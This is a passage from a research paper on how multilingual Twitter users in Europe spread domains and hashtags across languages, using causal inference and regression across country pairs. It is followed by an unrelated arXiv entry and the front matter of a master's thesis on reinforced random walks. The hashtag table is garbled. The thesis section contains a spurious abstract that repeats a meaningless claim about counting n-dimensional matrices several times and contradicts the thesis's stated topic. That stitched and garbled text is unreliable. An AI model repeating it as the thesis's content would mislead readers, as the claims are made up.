each stratum through a weighted regression to estimate the causal effect of the treatment. for language-based measures, such as identifying multilingual and language-specific domains/hashtags, but include retweets for information-sharing measures because they are an important component of information diffusion on Twitter. Hashtag sharing (Study 3)We similarly identify hashtags associated with each language. Unlike domains, language-associated hashtags can change rapidly because they may refer to short-term events, such as elections, protests, or upcoming TV shows. We thus separate the Decahose data into 60 14-day intervals, and use the log-odds ratio with informative Dirichlet priors to identify \(H_{x}^{i}\), the set of 100 hashtags most associated with \(L_{x}\) in interval \(i\), after again filtering out 200 most-frequent hashtags (e.g. _#blog_, _#radio_), those occurring _few_ than ten times in \(i\), and excluding retweets. A user \(u\) "shares" a hashtag from \(L_{x}\) if any of \(u\)'s Decahose tweets contain at least one hashtag \(h\in H_{x}^{i}\) during \(i\) or the subsequent period \(i+1\) (including retweets). Resulting hashtags reflect entertainment, sports, politics, and everyday life; see Supplemental Material Table S4 for examples of language-specific domains and hashtags. ### Causal inference setup We use propensity score stratification to estimate the causal effects of multilingual treatment variables on information diffusion outcomes [10]. Our procedure, shown in Figure 2, closely follows the guidelines provided by Stuart [10] and MatchIt [11]. We first fit a logistic regression model to calculate propensity scores, which represent the probability of receiving treatment as a function of the specified covariates [10]. Covariates are shared for all studies and capture aspects of users' Twitter behavior that may affect our outcomes [23]. These include verified status, network degree, follower and following counts, account age, number of tweets in the Decahose sample, "favorites" count, and post rate, all log-scaled. Covariates for each user are based on their most recent tweet in our sample. We then conduct propensity score stratification where units are separated into 25 strata based on propensity scores and verify sufficient balance for all covariates with absolute standardized mean difference less than 0.1 [11]. Although five strata have commonly been used in practice, more strata can yield less biased estimates for larger samples sizes [1]. Propensity score estimation, stratification, and balance checks are performed using the MatchIt R package [11]. We compare treated and untreated units within each stratum by fitting a regression of each outcome on treatment status, weighted by the matching weights. In particular, we estimate the average treatment effect on the treated (ATT); this estimates how the outcome among treated units is different than in the counterfactual scenario where they are not treated [23]. For all studies, we include covariate adjustment to control for direct effects that pre-treatment covariates may have on the outcome. Because each study defines units, treatment, and outcomes differently, the specific details of ATT estimation vary. In Study 1, we fit a linear regression after propensity score stratification to estimate the difference in (scaled and log-transformed) betweenness centrality. Here, multilingual increases betweenness centrality if ATT \(>\)0. In Studies 2 and 3, the outcomes are binary so we use logistic regression to estimate ATT as an odds ratio, a measure used in prior work to compare domain and hashtag sharing behaviors across languages [11]. For some treated user \(u\) who is monolingual in \(L_{x}\), the ATT estimates the odds that \(u\) shares a domain (hashtag) associated with \(L_{y}\) divided by the odds that \(u\) would share a domain (hashtag) associated with \(L_{y}\) in the counterfactual scenario where \(u\) is not treated. ATT \(>1\) indicates that having a multilingual \((L_{x},L_{y})\) contact increases an \(L_{x}\) monolingual's likelihood of sharing domains (hashtags) from \(L_{y}\). In each study, we estimate the ATT on aggregate data from both loci in all MCP networks in order to get a single causal estimate of the role of multilingual in cross-lingual information exchange. We additionally estimate separate ATT values for units from each locus in each MCP network, and analyze the variation across locus-specific causal effects later. To ensure sufficient data across strata, we only estimate locus-specific causal effects for locus \(C_{x}\) in MCP \((C_{x},C_{y})\) if there are at least 100 treated units. Furthermore, we only include locus-specific causal effects for Studies 2 and 3 if at least 100 units in the combined treated and untreated sample (all \(L_{x}\) monolinguals) have an outcome of 1 (share at least one domain or hashtag from \(L_{y}\)). ## 5 Overall effects of multilingual behavior All 3 studies support our hypothesis that multilinguals play an important role in cross-lingual information exchange. Betweenness centrality (Study 1)Multilingual \((L_{x},L_{y})\) users have higher betweenness centrality in the \((C_{x},C_{y})\) network than their monolingual peers, suggesting that these users serve as local bridges and thus are well-positioned to spread novel information across the network [12, 1]. The overall ATT is 0.034 ( \begin{table} \begin{tabular}{c c c c} \hline \hline & \multicolumn{3}{c}{Outcome} \\ \hline & Betweenness & Domain & Hashtag \\ & Centrality & Sharing & Sharing \\ & (Study 1) & (Study 2) & (Study 3) \\ \hline \# Eligible MCPs & 214 & 158 & 199 \\ \# Eligible Loci & 317 & 205 & 284 \\ \% Loci w/ sig. pos ATT & 46.37\% & 56.10\% & 50.00\% \\ \% Loci w/ no sig. ATT & 51.42\% & 40.49\% & 46.48\% \\ \% Loci w/ sig. neg ATT & 2.21\% & 3.41\% & 3.52\% \\ \hline \hline \end{tabular} \end{table} Table 2: Summary of causal effect of posting multilingually (Study 1) or having a multilingual friend (Studies 2 and 3) for users in each country (locus) across all multilingual country pairs (MCPs). Despite considerable variation across loci, each treatment has positive effects on information diffusion-related outcomes far more than negative effects. We estimate are average treated effect on the treated (ATT), and significance is determined at \(p<0.05\) with robust standard error estimation. \(0.0001\), with robust standard error estimation). In other words, multilingual posting increases the outcome of log-transformed betweenness by 0.034, which corresponds to a 13.5% increase in betweenness centrality. **URL domain sharing (Study 2)** Having a multilingual \((L_{x},L_{y})\) friend increases the odds of a monolingual \(L_{x}\) user sharing a domain from \(L_{y}\) by a factor of 15.57 (\(p<0.0001\)). For interpretability, we also estimate the average marginal effect with a marginal effects model on the logistic regression used for estimating the ATT as an odds ratio. We find that having a \((L_{x},L_{y})\) friend increases an \(L_{x}\) monolingual's probability of sharing an \(L_{y}\) domain by 20.0%. **Hashtag sharing (Study 3)** Having a multilingual \((L_{x},L_{y})\) friend significantly increases the odds of an \(L_{x}\) monolingual sharing a hashtag from \(L_{y}\) by a factor of 3.98 (\(p<0.0001\)). Through estimating the average marginal effect, we find that this corresponds to an increase in the probability of sharing an \(L_{y}\) hashtag by 32.7%. While the odds ratio for hashtag sharing is lower than for domains, the probability increase is greater because extremely low domain-sharing probabilities result in inflated odds ratios. Table 2 summarizes locus-specific causal effect estimates. Due to minimum inclusion criteria, we only estimate ATTs for a subset of all 464 loci corresponding to 232 MCPs. All three treatments increase information-sharing outcomes in about half of the loci, and decreases outcomes in under 4% percent of loci. Locus-specific estimates reinforce that multilinguals facilitate information exchange across language boundaries. However, the distribution of positive, negative, and insignificant effects across loci as shown in Table 2 suggests wide variation across MCPs and loci. ## 6 Variation across country pairs All three studies show that multilingual behaviors increase cross-lingual information exchange. However, locus-specific causal estimates indicate substantial heterogeneity in the magnitude of their effects across MCPs and loci. We conduct regression analyses to characterize how geographic, demographic, economic, political, and linguistic relationships between country pairs correlate with the effects of multilingual behaviors on European Twitter. ### Regression Setup We fit linear regression models to characterize how the causal effects of multilinguals vary across countries. For a given MCP \((C_{x},C_{y})\) and locus \(C_{x}\), we define 3 dependent variables: the estimated causal effects (ATT) of multilingual behavior in each of the 3 described studies. Independent variables capture relationships between \(C_{x}\) and \(C_{y}\). **Demographic variables** include the population ratio of \(C_{x}\) to \(C_{y}\) from 2019 based on CEPII's Gravity Dataset [1, 2]. Using 2017 World Bank migration data, we consider the fraction of \(C_{x}\)'s population born in \(C_{y}\), \(C_{y}\)'s population born in \(C_{x}\), and each country's population who are foreign-born.7 Footnote 7: worldbank.org/en/topic/migrationremittancesdiasporaissues/brief/migration-remittances-data **Geographic variables** are the distance (in km) between \(C_{x}\) and \(C_{y}\)'s population centers and time difference: the number of hours \(C_{y}\) is ahead (further east) of \(C_{x}\). **Economic variables** include i.) the ratio of \(C_{x}\) to \(C_{y}\)'s GDP per capita, ii.) if \(C_{x}\) and \(C_{y}\) are in an RTA (Regional Trade Agreement, which includes the EU), and ii.) trade flow between \(C_{x}\) and \(C_{y}\) averaged over both country's reports and both directions, normalized by the total population of both countries. Geographic and economic variables use 2019 data from CEPII's Gravity Dataset. **Political variables**, specifically material conflict between \(C_{x}\) and \(C_{y}\), are determined by querying the GDELT event database [1]. These include the percent of \(C_{x}\)'s external conflict actions inflicted on \(C_{y}\), and \(C_{y}\)'s external conflict actions inflicted on \(C_{x}\). The last fixed effect is **linguistic distance** between \(L_{x}\) and \(L_{y}\) using Glottolog [1]. Inspired by Samoilenko et al. [1]'s measurement of shared language families, we define a 4-level measurement of linguistic distance between \(L_{x}\) and \(L_{y}\): i.) no relationship (e.g. Spanish and Hungarian), ii.) in the same primary family (e.g. German and Polish are Indo-European), iii.) in the same branch (e.g. English and Swedish are Germanic), and iv.) in the same sub-branch (e.g. Spanish and Italian are Romance).8 Footnote 8: We do not use graph-based measurements of distance because there is wide variation across language branches’ structures due to an uneven interest by linguists across languages. We avoid multicollinearity issues by ensuring that all variables' variance inflation factor is under 4. We thus exclude highly-correlated variables, such as EU membership and each country's population. We weight each regression model by the number of treated units from each locus. Finally, we scale all variables by z-score to facilitate direct comparisons. ### Regression results **Geography** Multilinguals have a larger effect on cross-lingual information exchange in MCPs where \(C_{x}\) and \(C_{y}\) are further away from each other (Table 3). We visualize this pattern in Figure 3, which shows the relationship between geography and effects of multilinguals on betweenness centrality and domain sharing (see Figure S4 in Supplemental Material for the hashtag sharing map). In Figure 3, the effect of multilinguals in MCP \((C_{x},C_{y})\) and locus \(C_{x}\) is shown as a directed edge from \(C_{y}\) to \(C_{x}\). Only edges corresponding to significant estimates are drawn. Negative effects are red, positive effects are blue, and greater magnitude is represented with darker and thicker edges. For example, the dark blue edge from Russia to Spain in both maps indicates that Russian-Spanish multilinguals are especially important for bringing Russian information to Spain. In contrast, the faint edge from Portugal to Spain means that Portuguese-Spanish multilinguals have a smaller role in importing Portuguese information to Spain. We believe stronger treatment effects across longer distances are due to information accessibility. Information from faraway places is not readily accessible for monolinguals, so they may need to rely more on their multilingual friends to serve as information brokers. On the other hand, information between nearby countries such as Norway and Sweden may be more easily accessible with more channels for diffusion, possibly via more multilingual, so users rely less on individual multilinguals to spread information. In addition to distance, the time difference between \(C_{x}\) and \(C_{y}\) significantly predicts multilinguals' effects (Table 3). Multilinguals have the largest impact when \(C_{y}\) is 2-3 hours ahead (i.e., further east) of \(C_{x}\) (see Figure S1 in Supplemental Material). In other words, multilinguals have a large impact on spreading information from Eastern European languages to Western Europe. This asymmetric East-West pattern is visible in both maps of Figure 3 (e.g. the many dark blue outgoing links from Russia indicate a large influence of multilingual users from other countries who post in Russian). Why are Western European users of Eastern European languages so influential in cross-lingual information exchange? Fully answering this question is left for future work, but we speculate that it is a consequence of historical inaccessibility to information across strict Cold War-era borders. Additionally, offline connections may explain these users' online role as bridges; Eastern migrants in Western Europe have been characterized by more transnational and circular offline networks since the early 2000s [12]. DemographicsMultilingualism increases betweenness centrality more for users in smaller countries who post in more populous countries' languages, but this relationship is not significant for content sharing outcomes. While multilinguals in smaller countries are better positioned within MCP networks to spread novel information, they do not necessarily "import" information from the larger to smaller country. When \(C_{y}\) has a higher proportion of foreign-born residents, \((L_{x},L_{y})\) multilingual has a greater impact on \begin{table} \begin{tabular}{l c c c} \hline \hline & \multicolumn{4}{c}{_Dependent variable:_} \\ \cline{2-4} & Betweenness & Domain & Hashtag \\ & Centrality & Sharing & Sharing \\ \hline Geographic distance & \(0.020^{***}\) & \(0.434\) & \(0.412^{***}\) \\ Time difference & \(0.015^{**}\) & \(0.815^{***}\) & \(0.001\) \\ \hline Pop. \(C_{x}\) / \(C_{y}\) & \(-0.030^{***}\) & \(-0.031\) & \(0.017\) \\ \% \(C_{y}\) foreign-born & \(0.021^{**}\) & \(-1.100^{**}\) & \(-0.058\) \\ \% \(C_{y}\) pop. born in \(C_{x}\) & \(0.017^{**}\) & \(-0.044\) & \(-0.043\) \\ \% \(C_{x}\) foreign-born & \(-0.002\) & \(-0.031\) & \(0.064\) \\ \% \(C_{x}\) pop. born in \(C_{y}\) & \(0.007\) & \(-0.197\) & \(-0.040\) \\ \hline GDP per capita \(C_{x}\) / \(C_{y}\) & \(0.038^{***}\) & \(0.318\) & \(1.171^{***}\) \\ RTA & \(0.010\) & \(-0.411\) & \(0.216^{*}\) \\ Tradeflow per capita & \(-0.013^{*}\) & \(0.425\) & \(0.109\) \\ \hline \% \(C_{x}\)’s conflicts vs. \(C_{y}\) & \(0.019^{**}\) & \(-0.159\) & \(-0.032\) \\ \% \(C_{y}\)’s conflicts vs. \(C_{x}\) & \(0.002\) & \(-0.257\) & \(0.088\) \\ \hline Linguistic distance & \(-0.027^{***}\) & \(0.449\) & \(0.146^{*}\) \\ \hline Observations & 317 & 205 & 284 \\ R\({}^{2}\) & 0.266 & 0.193 & 0.448 \\ \hline \multicolumn{4}{l}{_Note:_} & \multicolumn{2}{c}{\({}^{*}\)p\(<\)0.1; \({}^{**}\)p\(<\)0.05; \({}^{***}\)p\(<\)0.01} \\ \end{tabular} \end{table} Table 3: Geographic, demographic, economic, political, and linguistic aspects of relations between countries \(C_{x}\) and \(C_{y}\) and their associations with the role of multilinguals spreading information from \(C_{y}\)’s dominant language to \(C_{x}\). Coefficients are from weighted linear regression models where the dependent variables are the locus-specific causal effects (ATTs) of multilingual behaviors in Studies 1-3. Figure 3: Maps of causal effects (ATTs) of multilingual treatments on information diffusion outcomes. The left map shows the ATTs of multilingual posting on betweenness centrality (Study 1), where each edge indicates ATT among users from the _destination_ node who post in both the source and destination nodes’ dominant languages. The right map shows the ATTs of having a multilingual friend on cross-lingual domain sharing (Study 2), where each edge indicates ATT among monolingual users from the _destination_ node on sharing URL domains associated with the _source_ node’s dominant language. Negative effects are shown with red arrows and positive are shown with blue arrows. The magnitude of the causal effect is indicated by arrow shading and width. Only statistically significant estimates (\(p<0.05\)) with robust standard error estimation are shown. users' structural role in \(C_{x}\), but not communication influence. In fact, having a multilingual friend has a negative impact on sharing a domain from \(L_{y}\) when \(C_{y}\) has more foreign-born residents; perhaps this is because shared links from \(L_{y}\) feature more content with multicultural or international appeal, so people rely less on multilinguals as information brokers. We observe no significant effects of the foreign-born population of \(C_{x}\) on either the structural role or communication influence of multilinguals. Economics and politicsMultilinguals' effects are associated with GDP per capita: multilinguals in \(C_{x}\) have more influence when \(C_{x}\) is wealthier than \(C_{y}\) (although this is not significant for domain sharing). However, government-level relationships including national trade agreements, trade-flows, and political conflict are not significant predictors. Linguistic similarityWe observe mixed results for linguistic distance. Our information accessibility hypothesis suggests \((L_{x},L_{y})\) multilinguals would play a larger role when \(L_{x}\) and \(L_{y}\) are very different because their monolingual peers would rely more heavily on them. This pattern appears to hold for communication influence outcomes but is not significant. Contrary to our hypothesis, multilinguals' structural role is amplified when \(L_{x}\) and \(L_{y}\) are closely related. Though we do not have a clear explanation for this pattern, it may be driven by deeper differences in the structures of MCP networks connecting countries with similar dominant languages [11]. ## 7 Variation across topics Different aspects of content, such as topic, framing, sentiment, and subjectivity, could amplify or hinder multilinguals' influence. Therefore, here we extend Study 3 to investigate how the role of multilinguals depends on the topic of shared hashtags using unsupervised topic modeling [13, 14]. Specifically, for each MCP \((C_{x},C_{y})\) we measure how having a multilingual \((L_{x},L_{y})\) friend affects the odds of an \(L_{x}\) monolingual from \(C_{x}\) sharing a _topic-specific hashtag_ from \(C_{y}\). ### Measuring multilinguals' role across topics Identifying topic-specific hashtagsWe train a multilingual contextualized topic model (CTM) to identify topics [1]. This approach uses multilingual sentence-BERT [10] as input to a variational autoencoder topic model to support zero-shot topic prediction for texts in unseen languages during training [15, 1]. Crucially, the CTM uses the same topics in all languages, making direct comparisons across languages possible. The CTM is trained for 20 epochs on a random sample of 1M English-language tweets from the European decaohose data. We set the total number of topics to 50 and retain default values for all other hyperparameters. We use the trained CTM to predict topic distributions for all tweets containing any hashtag highly associated with any language in any time interval. Tweets are assigned to the single topic with the highest probability, and hashtags are then assigned to single topics based on the most frequent topic of tweets in which it appears. We then manually inspect the ten most-frequent hashtags per topic to identify 15 topics of interest, where hashtags are coherent, meaningful, and reflect different types of content. These 15 topics account for 52.1% of European tweets from our dataset, and 66.8% of unique hashtags associated with any language at any time, which rises to 82.5% when accounting for hashtag frequency (see topic distributions in Figure S3 in Supplemental Material). Brief topic descriptions are in Table 4. To understand how content shapes multilinguals' influence, we separate the 15 topics into four macro-categories: entertainment, politics, sports, and promotion (e.g., giveaways). The distribution of hashtag macro-categories across languages are shown in Figure S2 in the Supplemental Material. EvaluationWe evaluated our multilingual hashtag topic assignment method with intrusion tests, following common practice [12]. Four hashtags were sampled from each topic \(t\) with frequency weighting, and one hashtag was sampled from one of the 49 other topics based on frequency. Annotators tried to identify which hashtag does _not_ belong to \(t\). We evaluated the 15 topics of interest in English, German, Spanish, Italian, and Turkish, selected based on annotators' language proficiencies. We conducted ten intruder tests for each topic in English, and 5 for each topic in the other languages. Three annotators completed the intruder test for English hashtags with an average accuracy of 0.73 and interannotator agreement of 0.67 (Krippendorff \(\alpha\)). Among tasks where at least two annotators selected the same intruder, accuracy rose to 0.78, and further rose to 0.89 for tasks where all three annotators agreed. Estimating causal effectsWe extend Study 3's design to compare multilinguals' effects across topics. For a given \begin{table} \begin{tabular}{l l l} **ID** & **Description** & **Example Hashtags** \\ \hline 1 & TV Shows & _skamitala, masterchefer, theachers, ibes_ \\ 10 & Fandoms & _jungkokok, cholicelandan, saveshedwhutters_ \\ 19 & Art & _painting, etsv, vintage, faison, archiceture, arte_ \\ 24 & Romance TV & _loveisland, poweroflowge, liebesgschichten_ \\ 44 & TV Promo & _comingsoam, lucidrometlik, sybunex_ \\ 3 & Job Promo & _career, hinging, johstarp, sales, jokesarch_ \\ 16 & Giveaways & _giveaways, freeble Friday, sortee, winwin, free_ \\ 31 & Music Promo & _radio, youtube, hits, newmusic, magic/tin, live_ \\ 11 & Government, News & _bheneva, 4fd, nadad, labour, parliament, orphan_ \\ 23 & Covid, Crisis, Tech & _coudi19France, konomavirus, polzic, tech, gdpr_ \\ 30 & International Politics & _france, syria, venezuela, eeua, iss, nigranti_ \\ 41 & Health & _mentahealth, autism, calapidens, disacapicalad_ \\ 46 & Requests & _stop, sabololopisielasjames, helpme_ \\ 47 & Equality & _metoo, sabemzzo, welfrauentag, racisme, lgbt_ \\ 48 & Sports & _arsenal, halamadrid, futhol, fcporte, rusia2018_ \\ \end{tabular} \end{table} Table 4: Fifteen topics of interest with example hashtags \begin{table} \begin{tabular}{l l l l l l} Language & English & Spanish & German & Turkish & Italian \\ \hline Accuracy & 0.731 & 0.747 & 0.813 & 0.587 & 0.627 \\ \end{tabular} \end{table} Table 5: Annotator accuracy on topic intrusion tests, averaged over 3 annotators for English. MCP \((C_{x},C_{y})\) and locus \(C_{x}\), units are \(L_{x}\) monolingual from \(C_{x}\) and the treatment is having at least one multilingual \((L_{x},L_{y})\) contact. For each topic \(t\), the outcome is whether a user shares a hashtag that belongs to topic \(t\) and is associated with \(L_{y}\). Our analysis focuses on overall causal effect estimates for all 15 topics. We also estimate locus-specific effects for each macro-category, with a summary of results and maps in the Supplemental Material (Figure S4). ### Results Figure 4 shows the effect of multilinguals by hashtag topic and macro-category. Three key findings support our hypothesis that multilinguals play a greater role in spreading information that is otherwise less accessible to their peers. First, multilinguals have a greater communication influence on the cross-lingual diffusion of political content than entertainment. Political discourse likely occurs more in regional or country-centric public spheres Schunemann (2020), so there is a greater reliance on multilingual individuals to broker political information across borders. Correspondingly, of all political topics, multilinguals play a smaller role for topics with widespread transnational popularity and awareness, such as: _Equality_, which includes hashtags for global gender equality movements like #metoo and #8m, and _International Politics_, which includes country names and non-European political organizations. Contrary to most political hashtags, entertainment hashtags often reflect globally-popular phenomena (e.g., K-pop fandons) despite being associated with specific languages, and more cross-lingual information cascades involve entertainment content Jin (2017). We believe that individual multilingual contacts play a smaller role in entertainment because there are more ways for that content to spread. Second, we argue that multilingual individuals are crucial for nascent social movements to gain global traction, but have a relatively small influence within well-established transnational movements. Figure 4 indicates that multilinguals have a large impact on spreading health-related information, which includes hashtags advocating for mental health awareness, COVID-related activism, and disability rights. In contrast to racial and gender equality movements reflected in the _Equality_ topic, organizing for disability rights gained traction as a social movement later than for race and gender both offline and on Twitter, where the public sphere about disability is still growing Scotch (1988); Sarkar et al. (2021). The initial adoption of burgeoning social movements across countries relies heavily on direct contacts, such as multilingual friends McAdam and Rucht (1993). Information diffusion about more well-established social movements do not depend on multilingual bridges because it occurs via many channels of communication, including news and television media McAdam and Rucht (1993). Third, multilinguals play an especially important role in sharing information about job searches and career opportunities. This parallels Granovetter (1973)'s argument about the strength of weak ties for job-seeking purposes. Even though monolingual users' ties with multilinguals are not necessarily weak, multilinguals similarly serve as bridges between different parts of a social network and thus facilitate access to novel information, such as job opportunities that users may not have otherwise been aware of. ## 8 Discussion Gaining a complete picture of global information diffusion requires understanding how information crosses languages. We design three studies to investigate how multilingual users participate in this process, which we use to quantify their structural role and communication influence in information exchange across European languages on Twitter. For each pair of countries with different dominant languages, we construct networks where users are connected if they have mutually "mentioned" each other. We use these networks in Study 1 to quantify the extent to which multilinguals' positions in these networks facilitate spreading novel information, as measured by betweenness centrality. In Studies 2 and 3, we quantify how having a multilingual contact influences the odds of monolingual users posting content from the other country's dominant language. Results from all three studies show that multilinguals play an outsize role in cross-lingual information exchange compared to their monolingual peers. Effects vary widely but systematically across country pairs and topics. We conduct regression analyses to measure how the role of multilinguals is associated with demographic, geographic, economic, political, and linguistic aspects of the relationship between country pairs. To compare multilinguals' influence across topics, we augment our study design for hashtag sharing with multilingual contextualized topic modeling. In general, multilingual individuals have a greater influence on the spread of information that is otherwise _less_ accessible to their monolingual peers, as they play more of a Figure 4: Causal effect (ATT) of having a multilingual friend on cross-lingual hashtag sharing across topics. All estimates have heteroskedasticity-consistent standard errors below 0.03 and are significant (p\(<\)0.0001). The x-axis shows log odds ratios, with 0 being no effect of having a multilingual friend, and the dashed line at 1.38 shows the overall effect on hashtag sharing. Colors represent macro-categories. gatekeeping role. Multilinguals have a greater effect on information diffusion between dominant languages of countries that are geographically far apart, with Western European multilinguals who post in Eastern European languages having an especially big influence. We identify a similar pattern for topics, where multilinguals have greater influence on cross-lingual information exchange for topics discussed in more restricted public spheres: national or regionally-oriented politics over entertainment which can have international appeal, nascent health-related social movements over established racial and gender equality movements, and job opportunities previously known only to small communities. We acknowledge that this work has important limitations. First, our studies do not account for multilinguals who use minority languages (e.g., Basque) or reside in highly multilingual countries (e.g., Switzerland). Imperfect performance of location inference and language detection also limited the set of countries and languages studied. Furthermore, we make the simplifying assumption that tweets are written in one language, which does not adequately account for code-mixing within posts and the users who engage in such practices [1]. While code-mixed tweets are a relatively small percent of Twitter communication [13], accurately recognizing these tweets at scale has proven challenging due to the absence of labeled data for training models [10]. As the performance and efficiency of language detection of code-mixed tweets improve, we anticipate that incorporating such information would be fruitful, and analyzing the relationship between code-mixing strategies and information diffusion could yield interesting theoretical insights. To avoid making assumptions about people's offline language usage or competence, we intentionally define multilinguals based on their performance on Twitter. However, this presents a significant limitation: users who only tweet in one language but understand multiple may also play an important, and perhaps different, role in information diffusion. Future research could employ different methodologies to highlight these users, such as linking social media activity with survey data about users' language backgrounds. Further research can also improve upon our study designs. We adopt a traditional causal inference setup, which considers treatment status binary to emulate randomized experiments. Thus, all of our studies involve collapsing underlying continuous variables into binary indicators. A possible next step would involve adapting our studies to account for continuous treatments; this would facilitate investigation of how cross-lingual information exchange is impacted by a user's degree of multilingualism (Study 1) or the number and/or strength of a user's ties to multilinguals (Studies 2 and 3). Beyond addressing these limitations, there are numerous avenues for future work. For example, we adopt a microscopic perspective on information diffusion by examining how multilingual impacts individual users' roles in information diffusion; we focus on local influence because it is more precise and less random than observations of information cascades [1]. Nevertheless, an interesting extension that takes a macroscopic perspective, perhaps involving simulations of cross-lingual information cascades [11], could help contextualize how these individual-level effects, in aggregate, shape the global flow of information. Another future direction would involve considering other forms of information that may spread via different mechanisms than URLs and hashtags, such as meme templates, images, videos, and text outside of hashtags. There is likely variation in the role of multilinguals across semantic dimensions beyond topic, such as emotional valence or misinformation. Finally, future research can assess the generalizability of our findings beyond the scope of European Twitter by applying our methodology to study other regions, languages, and platforms. ## 9 Broader impact and ethical considerations Understanding the role of multilinguals in information diffusion has immense consequences. Platforms like Twitter can empower multilinguals to spread information that supports positive outcomes such as knowledge-sharing, collaboration, crisis response, or social progress, thus enabling different language communities to benefit from a truly global social network [1, 12]. Our study not only highlights this potential but also identifies how it varies across topics and with respect to the geographical, linguistic, and political relationship between the countries. For instance, our research suggests that multilinguals can be better utilized to spread political news as opposed to entertainment. We also see that their importance is more pronounced for supporting information spread across countries further away from each other. Such findings not only highlight the contexts where multilinguals already play an important role but also help us identify the barriers for cross-lingual diffusion; in such situations, platforms may benefit more from technologies such as machine translation. Our research can also help platforms address dangerous consequences of global networks by focusing efforts on nudging multilinguals to mitigate the spread of harmful information such as misinformation, conspiracy theories, or online abuse. Past network science research shows the value of betweenness centrality in identifying nodes that can limit the spread of such information [15]. Here, we show that multilingual nodes tend to have high betweenness centrality. Furthermore, our study shows that multilinguals play a particularly important role in the spread of political topics, common targets for malicious actors aiming to spread propaganda and disinformation. Despite the potential for positive impact, we acknowledge the ethical risks of this work. Rather than stem the flow of harmful content, our work may inspire malicious agents to target and manipulate multilinguals into propagating such information. In addition, our focus on users of politically and socially-dominant language varieties and use of automated language detection excludes people whose posts contain endangered or minority languages, non-prestige dialects of dominant languages, or code-mixing. Although our work does not present direct harm to individuals, these decisions systematically exclude marginalized groups whose online behavior deserves equal consideration. To promote transparency and future research, we publicly share data, code, and models but take steps to preserve user privacy. The datasheets shared for causal effect estimation include only variables necessary to replicate our results. We do not share user IDs, raw text, or other personally-identifiable information. While the location inference tool used presents a privacy risk by inferring users' specific geo-coordinates, we only store information at the country level. ## 10 Conclusion By developing a set of causal inference studies that measure users' structural role and communication influence, we show that multilingually-posting users on European Twitter are particularly important for information diffusion across languages. These users have an especially large influence in situations where they serve more as gatekeepers in information flow, particularly in spreading information from places and topics that are otherwise inaccessible to their monolingual peers. This work is crucial for understanding how information is shared around the world, and has implications for platforms to support beneficial consequences of global social networks while mitigating potential harms. Publicly-available code, models, and aggregated data can be found at: [https://github.com/juliamendelsohn/bridging-nations](https://github.com/juliamendelsohn/bridging-nations). ## Acknowledgments This research was supported by the National Science Foundation (Grants IIS-1815875 and IIS-2007251) and through funding from the Volkswagen Foundation.
2309.02475
Variations on Reinforced Random Walks
This thesis examines edge-reinforced random walks with some modifications to the standard definition. An overview of known results relating to the standard model is given and the proof of recurrence for the standard linearly edge-reinforced random walk on bounded degree graphs with small initial edge weights is repeated. Then, the edge-reinforced random walk with multiple walkers influencing each other is considered. The following new results are shown: on a segment of three nodes, the edge weights resemble a P\'olya urn and the fraction of the edge weights divided by the total weight forms a converging martingale. On Z, the behavior is the same as for a single walker - either all walkers have finite range or all walkers are recurrent. Finally, edge-reinforced random walks with a bias in a certain direction are analysed, in particular on Z. It is shown that the bias can introduce a phase transition between recurrence and transience, depending on the strength of the bias, thus fundamentally altering the behavior in comparison to the standard linearly reinforced random walk.
Fabian Michel
2023-09-05T13:16:41Z
http://arxiv.org/abs/2309.02475v1
# Technical University of Munich ###### Abstract We present a new method for computing the number of \(n\)-dimensional matrices in a \(n\)-dimensional space. We show that the number of \(n\)-dimensional matrices in a \(n\)-dimensional space is bounded by a constant. We show that the number of \(n\)-dimensional matrices in a \(n\)-dimensional space is bounded by a constant. We also show that the number of \(n\)-dimensional matrices in a \(n\)-dimensional space is bounded by a constant. Technical University of Munich Department of Mathematics Master's Thesis in Mathematics Variations on Reinforced Random Walks Abwandlungen selbstverstarkender Irrfahrten Fabian Michel Supervisor: Prof. Dr. rer. nat. habil. Nina Gantert Submission Date: 16/09/2022 final digital version I confirm that this master's thesis is my own work and I have documented all sources and material used. Ich erklare hiermit, dass ich diese Arbeit selbstandig und nur mit den angegebenen Hilfsmitteln angefertigt habe. ###### Abstract This thesis examines edge-reinforced random walks with some modifications to the standard definition. An overview of known results relating to the standard model is given and the proof of recurrence for the standard linearly edge-reinforced random walk on bounded degree graphs with small initial edge weights is repeated. Then, the edge-reinforced random walk with multiple walkers influencing each other is considered. The following new results are shown: on a segment of three nodes, the edge weights resemble a Polya urn and the fraction of the edge weights divided by the total weight forms a converging martingale. On \(\mathbb{Z}\), the behavior is the same as for a single walker - either all walkers have finite range or all walkers are recurrent. Finally, edge-reinforced random walks with a bias in a certain direction are analysed, in particular on \(\mathbb{Z}\). It is shown that the bias can introduce a phase transition between recurrence and transience, depending on the strength of the bias, thus fundamentally altering the behavior in comparison to the standard linearly reinforced random walk. ## Zusammenfassung Diese Masterarbeit betrachtet (kanten-)selbstverstarkende Irrfahrten mit einigen Veranderungen im Vergleich zur gangigen Definition. Es wird eine Ubersicht uber bekannte Ergebnisse zum gangigen Modell gegeben und der Beweis, dass die linear selbstverstarkende Irrfahrt auf Graphen mit beschranktem Grad und hinreichend kleinen anfanglichen Kantengewichten rekurrent ist, wird wiederholt. Danach werden selbstverstarkende Irrfahrten mit mehreren Walkern, die sich gegenseitig beeinflussen, untersucht. Die folgenden neuen Resultate werden bewiesen: Auf einer Strecke mit drei Knoten ahneln die Kantengewichte einer Polya-Urne und der Anteil der Kantengewichte am Gesamtgewicht bildet ein konvergierendes Martingal. Auf \(\mathbb{Z}\) ist das Verhalten das gleiche wie fur einen einzelnen Walker - entweder besuchen alle Walker nur einen endlichen Teil des Graphen oder alle sind rekurrent. Zum Schluss wird die selbstverstarkende Irrfahrt mit Bias in eine bestimmte Richtung betrachtet, vor allem auf \(\mathbb{Z}\). Es wird gezeigt, dass der Bias einen Phasenubergang zwischen Rekurrenz und Transienz verursachen kann, der von der Starke des Bias abhangt, und damit das Verhalten im Vergleich zur normalen linear selbstverstarkenden Irrfahrt grundlegend andert. ###### Contents * List of Figures * List of Tables * 1 Introduction * 1.1 Literature * 1.2 Main Results * 2 Preliminaries * 2.1 Random Walks * 3 Selected Results * 3.1 Reinforced Random Walks * 3.1.1 Linearly Edge-Reinforced Random Walk * 3.1.2 Vertex-Reinforced Random Walk * 3.2 Urn Models * 3.2.1 Polya Urn * 3.2.2 Randomly Reinforced Urn * 4 Recurrence of Edge-Reinforced Random Walk * 4.1 Estimating Conductance Ratios * 4.2 Bounding the Error * 4.3 Bounding the Estimate * 4.4 Proof of Recurrence * 5 Reinforced Random Walk with Multiple Walkers * 5.1 A Two-Player Urn * 5.1.1 